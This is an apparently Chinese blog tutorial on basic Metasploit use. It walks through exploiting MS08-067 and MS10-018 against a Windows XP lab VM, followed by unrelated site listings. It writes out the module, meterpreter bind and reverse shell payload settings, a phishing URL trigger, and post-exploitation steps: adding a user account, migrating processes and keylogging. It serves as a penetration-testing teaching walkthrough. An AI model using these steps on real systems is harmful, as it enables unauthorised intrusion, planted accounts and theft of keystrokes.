news 2026/6/23 21:43:49

MSF的基础使用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
MSF的基础使用

以两个windows主机层面的漏洞,简单演示一下msf框架的使用。

MS08-067

简介

影响范围:MS08-067漏洞会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

漏洞产生的原因及攻击效果:如果用户在受影响的系统上收到特制的 RPC 请求,则可能导致攻击者在未经身份验证的情况下利用此漏洞运行任意代码,实现远程代码执行。现阶段,已经可以通过防火墙来阻断该漏洞的攻击。

漏洞利用

先测试网络连通性

1.输入msfconsole进入msf终端

2.查找利用ms08-067漏洞利用模块

search ms08-067
use exploit/windows/smb/ms08_067_netapi

3.查看该攻击模块下所需的配置信息

show options

4.设置options

设置攻击payload为bind模式

set payload windows/meterpreter/bind_tcp

reverse_tcp 反弹shell xp主动连接kali

bind_tcp:主动连接 kali主动攻击xp 不需要xp主机用户做啥操作,啥都不做就会被打

设置靶机地址:

set RHOST 192.168.1.6

查看targets

选择攻击目标

set target 34

5.检查options配置

6.expliot利用该漏洞 出现meterpreter则代表利用成功 拿到了系统的shell

后渗透

出现meterpreter则代表漏洞利用成功 接下来可以做一些后渗透的动作了

比如查看配置 进入win命令行 添加用户 键盘监听等

1.进入Windows Shell

shell

刚刚还是在msf攻击的控制台 现在是在windows的shell命令行

2.添加用户

net user didi 123 /add

3.使用 ps 查看进程

4.使用ps找到合适的进程进行迁移,迁移到有管理员权限的进程

比如我迁移到ie浏览器进程

开启键盘记录后 在xp浏览器端不管键盘敲什么都会被记录下来

执行keyscan_dump查看记录的情况

keyscan_stop 关闭键盘记录

MS10-018漏洞

简介

MS10-018是IE浏览器上的漏洞,主要危害Internet Explorer 6~7,攻击者可以通过该漏洞获取受害主机的控制权。

┗|`O′|┛ 嗷~~ 是打浏览器的漏洞,不是打系统的,但是同样可以达到RCE的效果

漏洞利用

实验环境:kali虚拟机 winxp虚拟机

先把防火墙打开 否则不需要受害者主机浏览器访问触发反弹shell就能执行成功

msf杀死某个session的命令

sessions -k 1

1.启动msf 搜索ms10_018

msfconsole search ms10_018

2.使用对应的exploit

use exploit/windows/browser/ms10_018_ie_behaviors

3.查看需要的配置 并且进行配置

payload采用reverse_tcp反弹shell的方式

所以需要反弹地址SRVHOST

可以设置其他地址 我们还是设置kali机器为反弹地址

此外也可以设置一下 URIPATH 这是钓鱼网站的url 需要受害者主机去访问该url 才能进行反弹shell

set SRVHOST 192.168.1.134 set URIPATH test666

查看修改后的配置

4.运行exploit

5.受害者主机访问http://192.168.1.134:8080/test666

6.反弹shell成功

7.进入会话中利用该会话

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/23 15:36:36

基于Java的安全检查巡视智慧管理系统的设计与实现全方位解析:附毕设论文+源代码

1. 为什么这个毕设项目值得你 pick ?安全检查巡视智慧管理系统将会员管理、设备管理、车辆管理和各类巡检任务关联起来,提供全面的分析和报告功能。该系统区别于传统的“烂大街”选题,在技术创新性和实用性方面具有明显优势:通过智能化的数据…

作者头像 李华
网站建设 2026/6/23 12:48:50

基于Java的安全生产指标智慧管理系统的设计与实现全方位解析:附毕设论文+源代码

1. 为什么这个毕设项目值得你 pick ?安全生产指标智慧管理系统的主要功能模块覆盖了从会员管理到安全事故管理等各个方面,全面涵盖了人员、设备及安全检查等多个维度。该系统通过会员角色管理和权限控制确保不同用户能够进行相应的操作;组织机构和岗位的…

作者头像 李华
网站建设 2026/6/23 17:10:43

基于Java的安全生产水利工程智慧管理系统的设计与实现全方位解析:附毕设论文+源代码

1. 为什么这个毕设项目值得你 pick ?安全生产水利工程智慧管理系统的设计与实现,摆脱了传统“烂大街”选题的窠臼。该系统主要功能模块涵盖人员管理、设备管理及任务分配等多个方面,在提高工作效率的同时保证生产安全。普通员工和部门领导的角色分工明确…

作者头像 李华
网站建设 2026/6/22 19:43:05

极客时间-DeepSeek应用开发实战

吃透 MoE 架构:DeepSeek 应用开发实战,从模型特性到项目部署 引言:MoE 时代的技术新边界 MoE(混合专家模型)架构正在重塑大语言模型的应用生态。当 GPT-4 揭开 MoE 的神秘面纱,DeepSeek 等国产 MoE 模型的…

作者头像 李华
网站建设 2026/6/23 18:24:55

Vue.Draggable高效拖拽排序实战指南:5分钟掌握核心用法

Vue.Draggable高效拖拽排序实战指南:5分钟掌握核心用法 【免费下载链接】Vue.Draggable 项目地址: https://gitcode.com/gh_mirrors/vue/Vue.Draggable Vue.Draggable是Vue.js生态中最受欢迎的拖拽组件库,它基于强大的Sortable.js构建&#xff0…

作者头像 李华